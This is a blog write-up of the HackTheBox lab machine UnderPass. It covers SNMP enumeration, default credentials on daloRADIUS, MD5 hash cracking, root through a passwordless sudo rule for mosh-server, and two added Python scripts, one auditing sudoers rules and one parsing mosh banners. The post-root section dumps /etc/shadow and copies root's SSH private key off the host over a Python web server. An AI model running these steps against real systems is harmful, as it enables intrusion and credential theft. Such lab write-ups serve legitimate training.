### [HackTheBox | Underpass](https://croclius.com/hackthebox-underpass/)

**Published:** May 10, 2025
**Author:** croclius

**Content:**

HackTheBox machine: https://www.hackthebox.com/machines/UnderPass

## Reconnaissance

### nmap/TCP

`nmap` finds two open TCP ports, SSH (22) and HTTP (80):

```bash
croc@hacker$ rustscan -a underpass.htb --ulimit 5000 -- -A -T5 -oA initial

Nmap scan report for underpass.htb (10.10.11.48)
Host is up, received conn-refused (0.30s latency).
Scanned at 2024-12-25 01:14:10 EST for 19s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK+kvbyNUglQLkP2Bp7QVhfp7EnRWMHVtM7xtxk34WU5s+lYksJ07/lmMpJN/bwey1SVpG0FAgL0C/+2r71XUEo=
|   256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ8XNCLFSIxMNibmm+q7mFtNDYzoGAJ/vDNa6MUjfU91
80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Based on the [OpenSSH](https://packages.ubuntu.com/search?keywords=openssh-server) and [Apache](https://packages.ubuntu.com/search?suite=default&section=all&arch=any&keywords=apache&searchon=names) versions, the host is likely running Ubuntu [jammy (22.04LTS)](https://packages.ubuntu.com/jammy/openssh-server).

Without valid credentials, SSH is not a viable entry point. Therefore, the primary attack surface is HTTP, where an Apache2 web server is running with a default page.

### nmap/UDP

I usually also kick off a UDP scan alongside the TCP scan. Since UDP scans can be slow, I limited it to the top 50 ports to reduce the time taken.

`nmap` finds `SNMP` open on UDP port `161`, which can be quite juicy!

```bash
croc@hacker$ sudo nmap -sU --top-ports 50 -T3 -oN UDPScan underpass.htb

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-25 01:17 EST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.27s latency).

PORT    STATE SERVICE
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 51.12 seconds
```

### Website - 80/TCP

#### Main Page

We have an Apache default web page, as already seen in the scan:

#### Directory Busting

Directory enumeration did not reveal anything notable. Most of the discovered paths return `403`, and `index.html` returning `200` is nothing unusual for an Apache web server.

```bash
croc@hacker$ gobuster dir -u http://underpass.htb -w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://underpass.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10671]
/server-status        (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
```

### SNMP - 161/UDP

With such a limited attack surface, it's worthwhile to explore UDP.

#### Finding the Community String

In order to interact with `SNMP`, a **community string** is required; it functions as a password that authenticates us to the agent. It's really common to see a community string of `public` for data that is meant to be public, so guessing that first is a good bet. Kali also ships a tool called `onesixtyone` that tries a list of common community strings against a host. Let's run it:

```bash
croc@hacker$ onesixtyone 10.10.11.48 -c /usr/share/doc/onesixtyone/dict.txt
Scanning 1 hosts, 50 communities
10.10.11.48 [public] Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
```

Utilizing the list of common community strings provided with the tool, we found out that our target host is indeed using `public` as the community string.

Another approach is to use the **Nmap Scripting Engine (NSE)** with the `snmp-brute` script to enumerate the community string.

```bash
croc@hacker:~$ sudo nmap -sU -p 161 --script=snmp-brute --min-rate 500 underpass.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 07:47 EST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.28s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials

Nmap done: 1 IP address (1 host up) scanned in 12.86 seconds
```

#### snmpbulkwalk/snmpwalk

We can utilize `snmpwalk` or `snmpbulkwalk` in order to enumerate SNMP. But before doing that, there's one more thing to look into.

SNMP uses a [hierarchical numbering scheme](https://docs.oracle.com/cd/E13203_01/tuxedo/tux90/snmpmref/1tmib.htm "hierarchical numbering scheme") (OIDs) to label the data it holds. An add-on package translates these numbers into readable names. Set it up with `apt install snmp-mibs-downloader` and comment out the `mibs :` line in `/etc/snmp/snmp.conf`.

Now, I used `snmpbulkwalk` with the community string `public` to enumerate SNMP. This revealed a contact address, `steve@underpass.htb`, and the presence of a `daloradius` server.

```bash
croc@hacker$ snmpbulkwalk -c public -v2c underpass.htb

SNMPv2-MIB::sysDescr.0 = STRING: Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (285355) 0:47:33.55
SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
SNMPv2-MIB::sysLocation.0 = STRING: Nevada, U.S.A. but not Vegas
SNMPv2-MIB::sysServices.0 = INTEGER: 72
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (5) 0:00:00.05
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
```

#### snmp-check

`snmp-check` can be used for the same purpose and gives more structured output:

```bash
croc@hacker$ snmp-check -c public -v 2c 10.10.11.48

snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.11.48:161 using SNMPv2c and community 'public'

[*] System information:

  Host IP address               : 10.10.11.48
  Hostname                      : UnDerPass.htb is the only daloradius server in the basin!
  Description                   : Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
  Contact                       : steve@underpass.htb
  Location                      : Nevada, U.S.A. but not Vegas
  Uptime snmp                   : 02:09:58.97
  Uptime system                 : 02:09:45.95
  System date                   : 2025-1-2 02:36:45.0

[*] Network information:

  Default TTL                   : noSuchObject
  TCP segments received         : noSuchObject
  TCP segments sent             : noSuchObject
  TCP segments retrans          : noSuchObject
  Input datagrams               : noSuchObject
  Delivered datagrams           : noSuchObject
  Output datagrams              : noSuchObject

[*] File system information:

  Index                         : noSuchObject
  Mount point                   : noSuchObject
  Access                        : noSuchObject
  Bootable                      : noSuchObject
```

#### Now, what??

**[daloRADIUS](https://github.com/lirantal/daloradius/wiki)** is a web-based management interface for RADIUS (Remote Authentication Dial-In User Service) servers. Specifically, it manages `FreeRADIUS`, a widely used open-source RADIUS server, and its database structure.

### A Hunch, but Well-Thought

#### /daloradius

Requesting `/daloradius` returned a `403 Forbidden`, which tells me that this is most probably the root directory of the daloradius web application.

#### Directory Brute Force

Let's bust subdirectories for `/daloradius` and hope for the best:

```bash
croc@hacker$ sudo feroxbuster -u http://underpass.htb/daloradius -w /usr/share/seclists/Discovery/Web-Content/big.txt 
                                                                                                               
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /   _/ | |   |__
|    |___ |   |   | __,    __/ /  | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.4
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://underpass.htb/daloradius
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/big.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.4
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      319c http://underpass.htb/daloradius => http://underpass.htb/daloradius/
200      GET      412l     3898w    24703c http://underpass.htb/daloradius/ChangeLog
200      GET      340l     2968w    18011c http://underpass.htb/daloradius/LICENSE
301      GET        9l       28w      323c http://underpass.htb/daloradius/app => http://underpass.htb/daloradius/app/
301      GET        9l       28w      327c http://underpass.htb/daloradius/contrib => http://underpass.htb/daloradius/contrib/
301      GET        9l       28w      323c http://underpass.htb/daloradius/doc => http://underpass.htb/daloradius/doc/
301      GET        9l       28w      330c http://underpass.htb/daloradius/app/common => http://underpass.htb/daloradius/app/common/
301      GET        9l       28w      330c http://underpass.htb/daloradius/contrib/db => http://underpass.htb/daloradius/contrib/db/
301      GET        9l       28w      327c http://underpass.htb/daloradius/library => http://underpass.htb/daloradius/library/
301      GET        9l       28w      325c http://underpass.htb/daloradius/setup => http://underpass.htb/daloradius/setup/
301      GET        9l       28w      331c http://underpass.htb/daloradius/doc/install => http://underpass.htb/daloradius/doc/install/
301      GET        9l       28w      333c http://underpass.htb/daloradius/app/operators => http://underpass.htb/daloradius/app/operators/
301      GET        9l       28w      339c http://underpass.htb/daloradius/app/common/includes => http://underpass.htb/daloradius/app/common/includes/
301      GET        9l       28w      338c http://underpass.htb/daloradius/app/common/library => http://underpass.htb/daloradius/app/common/library/
301      GET        9l       28w      335c http://underpass.htb/daloradius/contrib/scripts => http://underpass.htb/daloradius/contrib/scripts/
301      GET        9l       28w      340c http://underpass.htb/daloradius/app/common/templates => http://underpass.htb/daloradius/app/common/templates/
301      GET        9l       28w      341c http://underpass.htb/daloradius/app/operators/include => http://underpass.htb/daloradius/app/operators/include/
301      GET        9l       28w      338c http://underpass.htb/daloradius/app/operators/lang => http://underpass.htb/daloradius/app/operators/lang/
301      GET        9l       28w      341c http://underpass.htb/daloradius/app/operators/library => http://underpass.htb/daloradius/app/operators/library/
301      GET        9l       28w      347c http://underpass.htb/daloradius/app/operators/notifications => http://underpass.htb/daloradius/app/operators/notifications/
301      GET        9l       28w      348c http://underpass.htb/daloradius/app/operators/include/common => http://underpass.htb/daloradius/app/operators/include/common/
301      GET        9l       28w      348c http://underpass.htb/daloradius/app/operators/include/config => http://underpass.htb/daloradius/app/operators/include/config/
301      GET        9l       28w      347c http://underpass.htb/daloradius/contrib/scripts/maintenance => http://underpass.htb/daloradius/contrib/scripts/maintenance/
301      GET        9l       28w      340c http://underpass.htb/daloradius/app/operators/static => http://underpass.htb/daloradius/app/operators/static/
301      GET        9l       28w      352c http://underpass.htb/daloradius/app/operators/library/extensions => http://underpass.htb/daloradius/app/operators/library/extensions/
301      GET        9l       28w      352c http://underpass.htb/daloradius/app/operators/include/management => http://underpass.htb/daloradius/app/operators/include/management/
301      GET        9l       28w      346c http://underpass.htb/daloradius/app/operators/include/menu => http://underpass.htb/daloradius/app/operators/include/menu/
301      GET        9l       28w      344c http://underpass.htb/daloradius/app/operators/static/css => http://underpass.htb/daloradius/app/operators/static/css/
301      GET        9l       28w      355c http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor => http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor/
301      GET        9l       28w      347c http://underpass.htb/daloradius/app/operators/static/images => http://underpass.htb/daloradius/app/operators/static/images/
301      GET        9l       28w      348c http://underpass.htb/daloradius/app/operators/library/tables => http://underpass.htb/daloradius/app/operators/library/tables/
301      GET        9l       28w      357c http://underpass.htb/daloradius/app/operators/notifications/templates => http://underpass.htb/daloradius/app/operators/notifications/templates/
[####################] - 24m   409646/409646  0s      found:32      errors:66265  
[####################] - 8m     20477/20477   41/s    http://underpass.htb/daloradius/ 
[####################] - 10m    20477/20477   35/s    http://underpass.htb/daloradius/app/ 
[####################] - 9m     20477/20477   37/s    http://underpass.htb/daloradius/contrib/ 
[####################] - 10m    20477/20477   36/s    http://underpass.htb/daloradius/doc/ 
[####################] - 10m    20477/20477   33/s    http://underpass.htb/daloradius/app/common/ 
[####################] - 10m    20477/20477   33/s    http://underpass.htb/daloradius/contrib/db/ 
[####################] - 11m    20477/20477   31/s    http://underpass.htb/daloradius/library/ 
[####################] - 11m    20477/20477   31/s    http://underpass.htb/daloradius/setup/ 
[####################] - 13m    20477/20477   26/s    http://underpass.htb/daloradius/app/operators/ 
[####################] - 12m    20477/20477   28/s    http://underpass.htb/daloradius/doc/install/ 
[####################] - 13m    20477/20477   26/s    http://underpass.htb/daloradius/app/common/includes/ 
[####################] - 12m    20477/20477   28/s    http://underpass.htb/daloradius/app/common/library/ 
[####################] - 13m    20477/20477   27/s    http://underpass.htb/daloradius/contrib/scripts/ 
[####################] - 11m    20477/20477   30/s    http://underpass.htb/daloradius/app/common/templates/ 
[####################] - 11m    20477/20477   30/s    http://underpass.htb/daloradius/app/operators/include/ 
[####################] - 11m    20477/20477   32/s    http://underpass.htb/daloradius/app/operators/lang/ 
[####################] - 11m    20477/20477   32/s    http://underpass.htb/daloradius/app/operators/library/ 
```

#### /app/operators

Navigating to `/daloradius/app/operators`, I was redirected to the **daloradius login page**.

Note the difference between the application version shown on the login page and the one in the `ChangeLog` entry below:

Identifying the correct version is crucial when looking for exploits and CVEs. In my opinion the version on the login page is the most accurate. However, it's not required for solving this box.

#### Default Credentials

Whenever I see a login page, my first go-to is **default credentials** as they're just too common. I found the following default credentials in the [GitHub Repo](https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS#:~:text=To%20log%20in%20to%20the%20RADIUS%20Management%20application%2C%20use%20the%20following%20default%20credentials: "GitHub Repo"):

I tried the default credentials and they worked flawlessly:

There is one user in the users list: `svcMosh`, with what looks like an `MD5`-hashed password.

## Shell as svcMosh

### Hash Cracking

First of all, we confirm the hash type using `hash-identifier`:

As it is possibly an MD5 hash, let's try to crack it:

```bash
croc@hacker$ hashcat -m 0 svcmosh_hash.txt /usr/share/wordlists/rockyou.txt
```

Hurrah!! We successfully cracked the password! Have some dance lol!

### SSH

With `ssh` being open and a pair of credentials, we can try to gain initial access:

```bash
croc@hacker$ ssh svcMosh@10.10.11.48
svcMosh@10.10.11.48's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed Jan  1 04:31:04 PM UTC 2025

  System load:  0.05              Processes:             230
  Usage of /:   96.5% of 3.75GB   Users logged in:       1
  Memory usage: 17%               IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%

  => / is using 96.5% of 3.75GB

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Jan  1 16:21:17 2025 from 10.10.16.17
svcMosh@underpass:~$ 
```

Now, grab `user.txt`:

```bash
svcMosh@underpass:~$ ls
user.txt

svcMosh@underpass:~$ cat user.txt 
31955***************************
```

## Shell as Root

### Enumeration

The first things I look at after gaining a foothold on a Linux box are quick wins: shell history (which may contain a password), sudo permissions, and SUID/SGID binaries.

#### Sudo Privileges

I found that the user `svcMosh` has **passwordless sudo privileges** to execute the `/usr/bin/mosh-server` command as any user, including `root`.

```bash
svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
```
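As an added example (not part of the original write-up), here is a small audit script for the sudoers misconfiguration that roots this box: any rule that lets a user run a shell-spawning program as root is reported, and `mosh-server` qualifies because it executes the login shell of the account it runs as for whoever connects. The sudoers sample inside is constructed, modelled on the `sudo -l` output above.

```python
"""
Audit sudoers-style rules for root-capable access to shell-spawning programs.
Added example, not the write-up's own code; SAMPLE_SUDOERS is constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Programs that hand an interactive shell to whoever connects to them.
# mosh-server is the one on this box; extend the set for your own estate.
SHELL_SPAWNERS = {"/usr/bin/mosh-server"}

# user host=(runas) [TAG:] command[, [TAG:] command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\))?\s*(?P<body>.+)$"
)
TAG_RE = re.compile(
    r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW|INTERCEPT|NOINTERCEPT):\s*"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias",
                 "Runas_Alias", "@include")


@dataclass(frozen=True)
class Finding:
    user: str
    runas: str
    command: str
    nopasswd: bool


def can_run_as_root(runas: str | None) -> bool:
    """(ALL), (root), (ALL:ALL) and an omitted run-as list all allow root."""
    if runas is None:
        return True
    user_part = runas.split(":")[0].strip()
    return user_part in ("", "ALL", "root")


def audit_sudoers(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m or not can_run_as_root(m.group("runas")):
            continue
        nopasswd = False  # a tag stays in force for later commands on the line
        for spec in m.group("body").split(","):
            spec = spec.strip()
            while (tag := TAG_RE.match(spec)):
                if tag.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag.group(1) == "NOPASSWD"
                spec = spec[tag.end():]
            command = spec.split()[0] if spec else ""
            # "ALL" without a password is the classic open door; a shell
            # spawner is reported even when a password is required, since
            # the caller's own password is then enough to reach a root shell.
            if (command == "ALL" and nopasswd) or command in SHELL_SPAWNERS:
                findings.append(Finding(m.group("user"), m.group("runas") or "root",
                                        command, nopasswd))
    return findings


# Constructed sample modelled on the sudo -l output in the write-up.
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass, use_pty
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
svcMosh ALL=(ALL) NOPASSWD: /usr/bin/mosh-server
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, PASSWD: /usr/bin/mosh-server
www-data ALL=(www-data) NOPASSWD: /usr/bin/mosh-server
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f.user} -> ({f.runas}) {f.command} nopasswd={f.nopasswd}")
```

Dropping the `NOPASSWD` tag is not a fix here: `mosh-server` run as root still hands over a root shell, so the rule itself has to go.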

#### Mosh

Let's start by understanding mosh.

In simple words, `mosh` is a modern replacement for `SSH`. Since `SSH` relies on `TCP`, which keeps a session bound to a specific IP address, it struggles when you switch networks or the connection is interrupted. Mosh addresses this by using `UDP` with application-level sessions, so the session survives network changes.

Normally, if we have the target user's password and mosh is installed on the target, we can just connect with the `mosh` client and it does everything for us. Let's see this in action.

Install `mosh` on your Kali machine with `apt install mosh`. Then connect as the `svcMosh` user, since we have that user's password.

```bash
croc@hacker:~$ mosh svcMosh@10.10.11.48
The authenticity of host '10.10.11.48 ()' can't be established.
ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.48' (ED25519) to the list of known hosts.
svcMosh@10.10.11.48's password: 
```

What the `mosh` client does is establish a session over SSH and run `mosh-server` on the target. After the server starts, the SSH connection is dropped and the client switches to `UDP` for communication.

So we got a shell as the `svcMosh` user. But to do the same for `root`, we would need root's password, which we don't have. So we'll take a different route: doing it manually.

### Run the Mosh Server

Manually run `mosh-server` on the target box. It will listen on a high `UDP` port on the local machine. As soon as a client connects to that port, it executes the login shell of the user it runs as. Since we have `sudo` permissions over `mosh-server`, we can expect to get a shell as root.

```bash
svcMosh@underpass:~$ sudo mosh-server

MOSH CONNECT 60001 6odTyvz2KOIVZuV8fym5uw

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein 
License GPLv3+: GNU GPL version 3 or later .
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 1359]
```

If you want to, you can also choose the port yourself with the `new` subcommand's `-p` option:

```bash
svcMosh@underpass:~$ sudo mosh-server new -p 9005

MOSH CONNECT 9005 +4f+MTlmKWXtgliNPRoexA

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein 
License GPLv3+: GNU GPL version 3 or later .
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 1498]
```

### Connect through Mosh Client

`6odTyvz2KOIVZuV8fym5uw` is our base64-encoded session key and `60001` is the UDP port. The key is passed to `mosh-client` through the `MOSH_KEY` environment variable:

```bash
svcMosh@underpass:~$ MOSH_KEY=6odTyvz2KOIVZuV8fym5uw mosh-client 127.0.0.1 60001
```
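As an added example (not from the write-up), the following script does what the `mosh` wrapper does before it launches `mosh-client`: it parses the `MOSH CONNECT <port> <key>` banner printed by `mosh-server` and checks that the key is a 22-character unpadded base64 string that decodes to the 16-byte (128-bit) session key. The banner text inside is constructed from the output shown above; the port and key values are the ones from this box.

```python
"""
Parse mosh-server's connect banner and validate the session key.
Added example, not the write-up's own code; SAMPLE_OUTPUT is constructed.
"""
from __future__ import annotations

import base64
import re

# mosh-server prints "MOSH CONNECT <port> <key>" on its own line; the key is
# 16 random bytes in base64 with the trailing "==" padding stripped.
CONNECT_RE = re.compile(r"^MOSH CONNECT (\d+) ([A-Za-z0-9+/]{22})$")


def parse_mosh_connect(server_output: str) -> tuple[int, str]:
    """Return (udp_port, key) from mosh-server's stdout, or raise ValueError."""
    for line in server_output.splitlines():
        m = CONNECT_RE.match(line.strip())  # strip() also drops a trailing \r
        if m:
            port = int(m.group(1))
            if not 1 <= port <= 65535:
                raise ValueError(f"port out of range: {port}")
            return port, m.group(2)
    raise ValueError("no MOSH CONNECT line found")


def decode_mosh_key(key: str) -> bytes:
    """Restore the stripped padding and check the key is exactly 16 bytes."""
    raw = base64.b64decode(key + "==", validate=True)
    if len(raw) != 16:
        raise ValueError(f"expected a 16-byte key, got {len(raw)} bytes")
    return raw


def client_command(host: str, server_output: str) -> list[str]:
    """argv the wrapper would run; the key never goes on the command line."""
    port, key = parse_mosh_connect(server_output)
    decode_mosh_key(key)  # refuse malformed banners before launching anything
    # Note: mosh-server exits on its own if no client shows up within 60 s.
    return ["env", f"MOSH_KEY={key}", "mosh-client", host, str(port)]


# Constructed sample built from the mosh-server output shown in the write-up.
SAMPLE_OUTPUT = """\

MOSH CONNECT 60001 6odTyvz2KOIVZuV8fym5uw

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
[mosh-server detached, pid = 1359]
"""

if __name__ == "__main__":
    print(" ".join(client_command("127.0.0.1", SAMPLE_OUTPUT)))
```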

And, we got root! Congratulations(to me of course 😂)!

### Time-sensitive Connection Requirement

Now, make sure you connect to the `mosh-server` within 60 seconds of starting it. Otherwise the server shuts down automatically and you will see the following error when connecting with `mosh-client`:

### root.txt

```bash
root@underpass:~# ls
root.txt

root@underpass:~# cat root.txt 
8fff7***************************
```

## Post Root

We got the root flag, but the shell is really unstable; I'm not even able to scroll up. Let's look for other ways!

### Failed Attempt

#### Cracking the Root Hash

As root we have read access to `/etc/shadow`, so I thought I'd try cracking the root hash (although that proved to be a dumb idea!).

```bash
root@underpass:~# head -n 4 /etc/shadow
root:$y$j9T$y6GVl9yuguP9lhnKmS04c.$pzmkCXRNa/BCrMpnOUxIWUbVR905YSEHwW20O40wEaA:20057:0:99999:7:::
daemon:*:19103:0:99999:7:::
bin:*:19103:0:99999:7:::
sys:*:19103:0:99999:7:::
```

The `$y$` prefix specifies the **[Yescrypt](https://www.openwall.com/yescrypt/) algorithm**, a modern password-hashing algorithm designed for enhanced security and performance. `Hashcat` doesn't support `yescrypt`, so I used `john` to crack this hash.

However, this was going extremely slow so I aborted the session.

```bash
croc@hacker$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Remaining 1 password hash
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:08 0.00% (ETA: 2025-01-05 10:33) 0g/s 66.28p/s 66.28c/s 66.28C/s evelyn..kelly
0g 0:00:09:51 0.24% (ETA: 2025-01-05 18:40) 0g/s 71.06p/s 71.06c/s 71.06C/s iloveabby..dragon23
0g 0:00:17:57 0.46% (ETA: 2025-01-05 16:20) 0g/s 73.24p/s 73.24c/s 73.24C/s ilovenicky..harekrishna
0g 0:00:20:14 0.54% (ETA: 2025-01-05 14:08) 0g/s 75.65p/s 75.65c/s 75.65C/s peaches15..ninety
0g 0:00:29:23 0.75% (ETA: 2025-01-05 16:50) 0g/s 72.24p/s 72.24c/s 72.24C/s 190203..151718
0g 0:00:29:25 0.75% (ETA: 2025-01-05 16:48) 0g/s 72.26p/s 72.26c/s 72.26C/s 130303..12041986
Session aborted
```

### SSH Private Key

#### id\_rsa

I found an SSH `id_rsa` private key in `/root/.ssh` and copied it to the current directory. Next, I spun up a Python web server in the same directory:

```bash
root@underpass:~# find / -name id_rsa 2> /dev/null
/home/svcMosh/.ssh/id_rsa
/root/.ssh/id_rsa
root@underpass:~# cp /root/.ssh/id_rsa .
root@underpass:~# ls
id_rsa  root.txt
root@underpass:~# python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

I transferred it to my own machine:

### Shell Access via SSH

```bash
croc@hacker$ sudo ssh -i id_rsa root@10.10.11.48     
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Fri Jan  3 04:32:04 AM UTC 2025

  System load:  0.05              Processes:             233
  Usage of /:   85.7% of 3.75GB   Users logged in:       2
  Memory usage: 15%               IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%

  => / is using 85.7% of 3.75GB

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Dec 19 13:40:29 2024
root@underpass:~# 
